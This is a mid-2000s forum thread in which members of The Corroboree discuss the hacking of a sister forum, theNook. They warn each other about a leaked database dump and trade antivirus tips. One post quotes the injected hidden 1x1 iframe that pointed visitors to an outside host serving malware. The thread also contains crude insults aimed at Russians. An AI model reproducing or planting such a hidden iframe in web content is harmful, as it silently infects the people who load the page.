The Corroboree
Sign in to follow this  
bit

theNook forum is currently BACK ONLINE :)

There's a link to the forum sql database posted if you read the drivel you get from clicking on the forum links. I'm trying to dl it now in case nobody else gets it.

F'n script kiddie no lifers!

Edited by bit

do NOT click that link.

It contains the same

iframe shit that got everyone in this trouble in the first place.

This kiddy is just baiting you.

Oh yeah, and I hope this convinces you to put a robots.txt on shaman-australis.com T :P

do NOT click that link.

It contains the same

<iframe src="http://www.doubleh.fr/audio/index.htm" width=1 height=1></iframe>

iframe shit that got everyone in this trouble in the first place.

This kiddy is just baiting you.

It's not a link, it's in plain text:

maestro_black says: "Go away troll. If you made some money from it, then have fun spending it. Since i dont think we have any members in russia, i guess we could just block all of russia from connecting to here. And perhaps someone can explain to me why it is that all the script kiddys come from russia or other ex soviet countries. I mean is it just a breeding place for low iq retards who are to lazy to actually work out how to do proper penetration stuff."I hate you, ??????? ??????.......... I have again got access, already not through a forum, I have removed all, sql base too you dowhload sql base on this forum http://rapidshare.de/files/16530153/dump_nanook_forum.rar.html

As you can see, it's a rar file hosted on rapidshare.de I've got 90% so far.. I'll let you know what it is.

Edited by bit

It's a 304mb file called dump_nanook_forum.sql

I'm running sql server for my wsus, anyone know how I could go about mounting this to check it's contents?

what's a nook? what's going on??? :unsure:

You should've checked the source for the ownage banner. I advise virus scanning your computer at the least.

Can someone put me in contact with Dr Bombay, I have info on this dude he might find useful (I used to hang in similar circles).

You should've checked the source for the ownage banner. I advise virus scanning your computer at the least.

I see what you're getting at... what is at the doubleh page?

I'm pretty well protected here, but I wouldn't chance using IE to open that link... In opera it doesn't seem to do anything?

Just because you can't see it doesn't mean you aren't getting your shit pushed in :P

The duobleh page is like a secondary attack mechanism to infect users who check the forums with probably an IRC worm or related.

Ahhh fuck, hebrew just dropped off the chat after visiting the website. See what I mean?

so i shouldnt go to the nook?

Definitely not, unless your virus definitions are fully up to date, windows fully patched, and you use a browser other than IE.

Nothing to see anyway, just the message I posted above.

Fuck, I just went there, then suddenly my AVG antivirus popped a couple of 'VIRUS DETECTED' windows up. Fucking stupid hacker people.

As I was just saying to hebrew teo, norton is a pile of shit.

I wouldn't honestly rely on it to protect you from anything.

EDIT: Except possibly because it slows your computer down so much you can't access exploited sites :P

Edited by apothecary

Fucking stupid hacker people.

We aren't all bad zee :P

Haha, sorry apoth...I was referring specifically to these assholoes, and others who do similar things. But yes I heard on the radio the other day that not all hackers are necessarily bad. I'm sure you wouldn't do an asshole thing like that.

So anyway, you mentioned how norton is a pile of shit. I use AVG + spybot. But, I am quite illiterate when it comes to keepin yo' shit protected on the computer. Any other programs you would reccomend?

No members in russia? Jorge has provided links to Russian hosts before, at the nook and at Ayahuasca.com, he is also pissed about his bad reputation at the nook. I am not saying it was anyone, but there is something to consider.

Just lucky Iw as away during all this crap. I just got a new puter set up and really do not want to have virus hassles now B)

WR

anyone else find this in their email?

post-940-1143511128_thumb.jpg

So does anyone know what the affect of the virus is?

I'm still on dial-up and when I clicked on to the nook yesterday and realized some kind of funny buggers was afoot and I was being redirected or something, I immediately turned my computer off. Nothing seems to be wrong and a virus check picked up nothing.

ED: Yeah I got the e-mails Am.

Edited by strangebrew

I don't run any anti virus software on my computer because I format it quite regularly anyway. However i'm running windows 2000 and with IE 5 and have not noticed any problems and I have visited the nook throughout the last 2 days but not opened any emails or downloaded any files. No popups, connection or software issues so far.

Could one of you protected folks let us others know when it is safe to return to The Nook. I hit it once at my folks place which is protected and the scanners caught it and deleted it. I then checked at my place later and it was up and working. But then that maestro-black message came up when I went back. It got funky at home and then I turned off the tower quickly. I did a couple scans and nothing seems to be wrong, but I don't dare go back to The Nook until someone says things are all clear.

~Michael~

Does nobody have Dr Bombays contact info? I have some info for him that he should probably at least be aware of.